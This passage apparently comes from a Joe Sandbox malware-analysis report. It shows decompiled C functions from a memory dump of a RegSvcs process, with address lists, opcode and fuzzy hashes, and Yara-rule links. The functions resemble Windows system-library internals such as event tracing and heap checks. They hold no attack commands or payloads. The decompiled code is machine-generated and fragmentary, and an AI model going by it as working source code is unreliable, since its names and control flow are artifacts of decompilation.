					return E01037016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x00fbb1e8
0x00fbb1ea
0x00fbb1f3
0x01014a17
0x00fbb1f9
0x00fbb1f9
0x00fbb1f9
0x00fbb201
0x01014a21
0x01014a2e
0x00000000
0x00000000
0x01014a3b
0x01014a4d
0x01014a3d
0x01014a46
0x01014a46
0x01014a55
0x00000000
0x00000000
0x00000000
0x00fbb20a
0x00fbb20a
0x00fbb20a
0x00fbb20a

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: cdb29dc593439b8170e0b334e97381fc460ce0a0f23d921cf371604d2a032ea1
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: C201D6336006809BD323975EC804F997BD9EF41750F4D00A1F954CB6B6D7B8C800D614

Uniqueness

Uniqueness Score: -1.00%

Function 01071229 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01071229(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				void* __edi;
				void* __esi;
				signed char* _t16;
				intOrPtr _t22;
				signed int _t24;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				signed int _t33;

				_t29 = __edx;
				_v8 =  *0x10ad360 ^ _t33;
				_t32 = __ecx;
				_t30 =  &_v48;
				_t24 = 0xa;
				memset(_t30, 0, _t24 << 2);
				_t31 = _t30 + _t24;
				_v16 = _t32;
				_v42 = 0x1036;
				_v12 = _t29;
				if(E00FD7D50() == 0) {
					_t16 = 0x7ffe0380;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t16 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t22, _v8 ^ _t33, _t29, _t31, _t32);
			}

0x01071229
0x01071238
0x0107123d
0x0107123f
0x01071246
0x01071247
0x01071247
0x0107124e
0x01071251
0x01071255
0x0107125f
0x01071271
0x01071261
0x0107126a
0x0107126a
0x0107127c
0x0107127d
0x0107127f
0x01071284
0x01071299

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e5257679cf66984c2c3f256c1d0099abde970a9a6beab75b4a88294177dd35
Instruction ID: 8efef4c845e562f724ef5ee5352e1ebeb558d58f5edef9a1298233159c33333d
Opcode Fuzzy Hash: c2e5257679cf66984c2c3f256c1d0099abde970a9a6beab75b4a88294177dd35
Instruction Fuzzy Hash: 1701A972E04618ABDB14EBF9C8059BFB7B8EF44710F008096FA11EB2D1EA75D9118794

Uniqueness

Uniqueness Score: -1.00%

Function 010717D2 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E010717D2(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				void* __edi;
				void* __esi;
				signed char* _t16;
				intOrPtr _t22;
				signed int _t24;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				signed int _t33;

				_t29 = __edx;
				_v8 =  *0x10ad360 ^ _t33;
				_t32 = __ecx;
				_t30 =  &_v48;
				_t24 = 0xa;
				memset(_t30, 0, _t24 << 2);
				_t31 = _t30 + _t24;
				_v16 = _t32;
				_v42 = 0x1038;
				_v12 = _t29;
				if(E00FD7D50() == 0) {
					_t16 = 0x7ffe0380;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t16 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t22, _v8 ^ _t33, _t29, _t31, _t32);
			}

0x010717d2
0x010717e1
0x010717e6
0x010717e8
0x010717ef
0x010717f0
0x010717f0
0x010717f7
0x010717fa
0x010717fe
0x01071808
0x0107181a
0x0107180a
0x01071813
0x01071813
0x01071825
0x01071826
0x01071828
0x0107182d
0x01071842

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252c365ddc0a298f4566de51c8b8e5e25613c9796050fff18db406e4b81bf96d
Instruction ID: 09f96ca14c3815cc9b7c92a20ad18df9163ad7a3ef9744245a57cdc820c4741c
Opcode Fuzzy Hash: 252c365ddc0a298f4566de51c8b8e5e25613c9796050fff18db406e4b81bf96d
Instruction Fuzzy Hash: 6E01A932E0465CABD704EFB9C8059AEB7B9EF45710F40809AF611EB291DA74D9059790

Uniqueness

Uniqueness Score: -1.00%

Function 0104FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0104FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x10ad360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E00FD7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0104fe96
0x0104fe9e
0x0104fea1
0x0104fead
0x0104feb3
0x0104feb9
0x0104fec3
0x0104fed5
0x0104fec5
0x0104fece
0x0104fece
0x0104fee0
0x0104fee1
0x0104fee3
0x0104fee8
0x0104fefb

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e3a241eca6b6c266c87f6e5d282ec152efd145b6114d8ffa2ae4fc401a42eb
Instruction ID: 80e48c48593cd17d510606eb25cc114df560eda020d34a1697e2396853313757
Opcode Fuzzy Hash: b0e3a241eca6b6c266c87f6e5d282ec152efd145b6114d8ffa2ae4fc401a42eb
Instruction Fuzzy Hash: A6018670A0420DEFCB14EFA9D942A6EB7F4FF04700F5441A9B944DB392D639D901DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0107131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0107131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x10ad360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E00FD7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0107131b
0x0107132a
0x01071330
0x01071336
0x0107133e
0x01071341
0x01071344
0x0107134f
0x01071361
0x01071351
0x0107135a
0x0107135a
0x0107136c
0x0107136d
0x0107136f
0x01071374
0x01071387

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fb3e77ea98c5a59992959dc5e45abb5bc0e52d3c77d1590c52e7ef13b8444f2
Instruction ID: 96dd2ab439660c2699ad321b9274040311d65aae6bfddbfb964548591c08e848
Opcode Fuzzy Hash: 0fb3e77ea98c5a59992959dc5e45abb5bc0e52d3c77d1590c52e7ef13b8444f2
Instruction Fuzzy Hash: 65013171E0520CAFCB04EFA9D945AAEB7F4FF08700F408059B945EB391E674DA00DB54

Uniqueness

Uniqueness Score: -1.00%

Function 01088F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01088F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x10ad360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E00FD7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01088f6a
0x01088f79
0x01088f81
0x01088f84
0x01088f8b
0x01088f91
0x01088f94
0x01088f9e
0x01088fb0
0x01088fa0
0x01088fa9
0x01088fa9
0x01088fbb
0x01088fbc
0x01088fbe
0x01088fc3
0x01088fd6

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2624da01e2ac9deb7a37f7b844b01bb4273766302d054f29bcf1cfc073810598
Instruction ID: 3d02d2fb3e86f1ff57dd9ebacc5349a08d00a57656be565993327f14e9e2a59b
Opcode Fuzzy Hash: 2624da01e2ac9deb7a37f7b844b01bb4273766302d054f29bcf1cfc073810598
Instruction Fuzzy Hash: 2401497490420CAFD700EFA8D545A6EB7F4EF08300F508056B945EB351D678DA00DB54

Uniqueness

Uniqueness Score: -1.00%

Function 01071608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01071608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x10ad360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E00FD7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01071608
0x01071617
0x0107161d
0x01071625
0x01071628
0x0107162b
0x01071636
0x01071648
0x01071638
0x01071641
0x01071641
0x01071653
0x01071654
0x01071656
0x0107165b
0x0107166e

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90fecc2d2ea630173ca910150d5a1fa037805868ff8cd696eb3f7e74e8d9632
Instruction ID: 68f35ee14a56be3f5e23b695d4d6dc436f25b250cb0498f5173ac1b580dc900d
Opcode Fuzzy Hash: a90fecc2d2ea630173ca910150d5a1fa037805868ff8cd696eb3f7e74e8d9632
Instruction Fuzzy Hash: 87F06271E0424CEFDB14EFA9D846A6EB7F4EF08300F444099BA45EB391E638DA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00FDC577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FDC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E00FDC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xf911cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E010888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x00fdc577
0x00fdc57d
0x00fdc581
0x00fdc5b5
0x00fdc5b9
0x00fdc5ce
0x00fdc5ce
0x00fdc5ca
0x00000000
0x00fdc5ca
0x00fdc5c4
0x00fdc5c8
0x00000000
0x00000000
0x00000000
0x00fdc5ad
0x00000000
0x00fdc5af

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9fc967579760c05486f00e614bf6fc87c94cf958ee87d1149f4da8213f50309
Instruction ID: 2de5d0ad3ed85d283b40bde3c082905a7a73e1817c72d3b40460ef70c97e716b
Opcode Fuzzy Hash: e9fc967579760c05486f00e614bf6fc87c94cf958ee87d1149f4da8213f50309
Instruction Fuzzy Hash: 8EF09AB3D156929ED7319728A104B227BEB9B25770F6C8467E55687301C6A4FC80E2D0

Uniqueness

Uniqueness Score: -1.00%

Function 01072073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01072073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0106FD22(__ecx);
				_t19 =  *0x10a849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x10a8748; // 0x0
					if(__eflags <= 0) {
						E01071C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x10a8724 & 0x00000004;
							if(( *0x10a8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x10a8724; // 0x0
					return E01068DF1(__ebx, 0xc0000374, 0x10a5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01072076
0x01072078
0x0107207d
0x01072083
0x010720a4
0x010720aa
0x010720ac
0x010720b7
0x010720ba
0x010720bc
0x010720c9
0x010720c9
0x010720d0
0x010720d2
0x00000000
0x010720d2
0x010720be
0x010720c3
0x010720c5
0x010720c7
0x00000000
0x00000000
0x010720c7
0x010720bc
0x010720d4
0x01072085
0x01072085
0x010720a3
0x010720a3

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ea6752c7c7f8f8402560a91f2c9bab5c0220008e32c2c01c1b95f41f1c41eab
Instruction ID: 64ea4ad04f421f43ec207858e13f150e2366e2751e17b81308d7f73ff96790bf
Opcode Fuzzy Hash: 1ea6752c7c7f8f8402560a91f2c9bab5c0220008e32c2c01c1b95f41f1c41eab
Instruction Fuzzy Hash: 37F02736D155954ADE736B6874002E53FD6E755110B4940C6E5D017206C4398993CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00FF927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00FF927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E00FFFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E00FF92C6(_t11, _t14);
				}
				return _t11;
			}

0x00ff9295
0x00ff9299
0x00ff929f
0x00ff92aa
0x00ff92ad
0x00ff92ae
0x00ff92af
0x00ff92b0
0x00ff92b4
0x00ff92bb
0x00ff92bb
0x00ff92c5

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 66946f1ddba270746c0ed0b0e4f27a6e52d2e100574c714dbf4a68b8de2de5cd
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: E9E0ED322406002BE7219F0ACC81B2376A9AF82B30F044079BA041E293CAEADC0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 01088D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01088D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x10ad360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E00FD7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x01088d34
0x01088d43
0x01088d4b
0x01088d4e
0x01088d52
0x01088d5c
0x01088d6e
0x01088d5e
0x01088d67
0x01088d67
0x01088d79
0x01088d7a
0x01088d7c
0x01088d81
0x01088d94

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c637e3aa88b7627ad9cacf419cc3b18f1adc4d10f9cff1ff946ce10275b4458a
Instruction ID: 8402b4d6a4a8bcc8f7227a4e6bfbb98da933524d20be56dbccde7dce51bcec26
Opcode Fuzzy Hash: c637e3aa88b7627ad9cacf419cc3b18f1adc4d10f9cff1ff946ce10275b4458a
Instruction Fuzzy Hash: E3F03071A0870CAFDB14FFA9D946A6E77B4AF14700F50809AF945EB291EA38D9009B54

Uniqueness

Uniqueness Score: -1.00%

Function 01088B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01088B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x10ad360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E00FD7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01088b67
0x01088b6f
0x01088b72
0x01088b7d
0x01088b8f
0x01088b7f
0x01088b88
0x01088b88
0x01088b9a
0x01088b9b
0x01088b9d
0x01088ba2
0x01088bb5

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9fbe8364997166f437f50823e95264d4a17cce614bb765f01edfb93a3d34895
Instruction ID: c3bbf4860863d25c506631fb0532653234e99abd25346d606ff016d42d62b839
Opcode Fuzzy Hash: a9fbe8364997166f437f50823e95264d4a17cce614bb765f01edfb93a3d34895
Instruction Fuzzy Hash: 5BF082B0A1825CABDB10FBA8D906E7E77B8EF44300F444499BA45DB391FA78D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 00FD746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FD746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E00FCEB70(__ecx, 0x10a79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E00FF95D0();
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x00fd746d
0x00fd746d
0x00fd746d
0x00fd7471
0x00fd7488
0x0101f92d
0x00fd748e
0x00fd7491
0x00fd7495
0x0101f937
0x0101f93a
0x0101f94e
0x0101f953
0x0101f956
0x0101f956
0x00fd7495
0x00000000
0x00fd7488
0x00fd7473
0x00fd7478
0x00fd747d
0x00fd7481
0x00000000
0x00fd7481
0x00fd747d
0x00fd747a
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02155cf4111cabffb82ece4f67aaf8d5f0fb31948270c3c713a99c98b4410894
Instruction ID: 2a101adac3be99cfacd05a6330c6180ee1b3d37f34fd7ae8c87cb7e195875556
Opcode Fuzzy Hash: 02155cf4111cabffb82ece4f67aaf8d5f0fb31948270c3c713a99c98b4410894
Instruction Fuzzy Hash: 57F09035909345EACB02F768C841B79BBA3AF06360F6C0257E491AF261F7699C01A6C5

Uniqueness

Uniqueness Score: -1.00%

Function 01088CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01088CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x10ad360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E00FD7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01088ce5
0x01088ced
0x01088cf0
0x01088cfb
0x01088d0d
0x01088cfd
0x01088d06
0x01088d06
0x01088d18
0x01088d19
0x01088d1b
0x01088d20
0x01088d33

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8304bee292403f6284cc9d3c9d05876dde732c3a53080e5df6e19321202b46bc
Instruction ID: 1da95e03485dd20f95cbc8cf78aa9061a860c4ab737f376d62c9f927dc934127
Opcode Fuzzy Hash: 8304bee292403f6284cc9d3c9d05876dde732c3a53080e5df6e19321202b46bc
Instruction Fuzzy Hash: 0BF08270A0860CABDB04FFA9D946E6E77B4EF09300F54419AF955EB391EA38D900D754

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB4F2E(void* __ecx, char _a4) {
				void* __esi;
